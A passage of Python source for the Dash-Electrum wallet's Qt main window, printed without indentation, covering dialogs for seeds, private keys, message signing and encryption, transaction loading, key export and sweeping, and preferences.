grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox when there are multiple master public keys (e.g. multisig cosigners)
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Dash-Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_dash.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Dash-Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_dash import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a dash URI
if str(data).startswith("dash:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Dash-Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.get_transaction(txid)
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Dash-Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
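# Note: depending on the is_csv flag, the export above is either a CSV file
# with one "address,private_key" row per address, or a JSON object mapping
# each address to its private key.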
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_dash.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
tabs.setObjectName("settings_tab")
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_dash.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
])
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', False)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 DASH = 1000 mDASH. 1 mDASH = 1000 uDASH. 1 uDASH = 100 duffs.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_dash import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 duffs might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Dash-Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Dash-Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
